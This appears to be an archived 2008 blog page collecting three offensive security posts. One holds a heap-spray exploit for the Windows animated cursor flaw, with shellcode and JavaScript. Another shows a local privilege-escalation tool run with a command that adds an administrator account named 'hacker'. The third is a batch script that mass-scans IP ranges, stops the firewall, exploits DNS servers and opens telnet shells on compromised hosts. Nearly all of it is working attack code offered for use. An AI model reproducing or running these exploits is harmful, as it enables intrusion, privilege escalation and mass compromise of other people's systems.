Archive

Posts tagged ‘overflow’

Vista cursor remote overflow source code

July 23, 2008  No comments

From: 搁浅's Blog

..::[ geqian presents ]::..

Windows Animated Cursor Handling Exploit (0day)

Works on fully patched Windows Vista
I think it is the first real remote code execution exploit on Vista =)

Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
(It should also work on all NT-based Windows, but this is untested)

Author: geqian
Mail: 70527418@vip.qq.com

Bug discovered by determina (http://www.aground.cn/)

Credit: geqian, http://www.aground.cn/

invokes calc.exe if successful

-->

<SCRIPT language="javascript">
var heapSprayToAddress = 0x07000000;

var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

var heapBlockSize = 0x400000;

var payLoadSize = payLoadCode.length * 2;

var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

var spraySlide = unescape("%u4141%u4141");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);

heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

memory = new Array();

for (i=0;i<heapBlocks;i++)
{
    memory[i] = spraySlide + payLoadCode;
}

document.write("<HTML><BODY style=\"CURSOR: url('riff.htm')\"> </BODY></HTML>")
wait(500)
window.location.reload()

function getSpraySlide(spraySlide, spraySlideSize)
{
    while (spraySlide.length*2<spraySlideSize)
    {
        spraySlide += spraySlide;
    }
    spraySlide = spraySlide.substring(0,spraySlideSize/2);
    return spraySlide;
}
</SCRIPT>
Category: Network Security

MS08025

April 21, 2008  No comments

Note: I saw this somewhere the day before yesterday but didn't save it; posting it here so I can use it when I'm not on my own machine!
A genuinely working MS08025.
Running it several times will blue-screen the server, so run all the commands in a single invocation.
For example:
        MS08025 "cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add"
        Local Privilege Escalation Vulnerability Exploit(MS08025)
        Modify by [F.S.T] For 姬良
        Run paltform: Windows 2k,xp,2k3,vista
ImageName: \WINDOWS\system32\ntkrnlpa.exe

Category: Tool Collection

DNS mass overflow batch script

March 27, 2008  No comments
@shift 1
@ setlocal
@ cls
@ color A
@ title DNS批量溢出个人版
@echo =========================================
@echo DNS批量溢出个人版
@echo BY Amxking
@echo 1.输入您想溢出的IP段 格式:XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX 
@echo=========================================
@ set /p input=1.输入您想溢出的IP段:
@ echo %input%>>ip.txt
@ net stop sharedaccess
@ net start server
@echo ========================================
@set /p c=请选择扫描方式: (1为TCP,2为syn):
@if "%c%"=="2" goto syn
@if "%c%"=="1" goto tcp

:syn
@for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do %MYFILES%\s syn %%i %%j 53 /save
@ goto ip

:tcp
@for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do %MYFILES%\s tcp %%i %%j 53 1000 /save

@ goto ip

:ip
@for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
@for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
@for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt

@del ip.txt
@del s1.txt
@del s2.txt
@del Result.txt
@echo============================================
@echo 等待溢出…………当出现类似203.80.19.6 1077 :Vulnerability OS:window 2003
@echo 为可以溢出的IP 203.80.19.6 为IP 1077为端口 2003 为系统类型
@echo 请把能溢出的保存为boot.txt 保存格式:IP 端口 系统 例如 58.34.125.200 1029 2003
@echo============================================
@ FOR /F "eol= tokens=1 delims= " %%i in (s.txt) do %MYFILES%\dns -s %%i >>a.txt
@echo============================================
@echo 请把能溢出的保存为boot.txt 保存格式:IP 端口 系统 例如 58.34.125.200 1029 2003
@echo============================================
@pause

@ for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%\dns -t2000all %%i %%j

@for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%\dns -t2003eng %%i %%j
@goto yichu
:yichu
@for /F "eol=s tokens=1 delims= " %%i in (boot.txt) do echo telnet %%i 1100>>3.txt
@for /F "eol= tokens=1 delims=" %%i in (3.txt) do echo %%i>>%%i.bat
@del s.txt
@del a.txt
@del 3.txt

@echo============================================
@echo 运行生成的批处理 等待溢出…………
@echo============================================
@pause
Category: V.B.T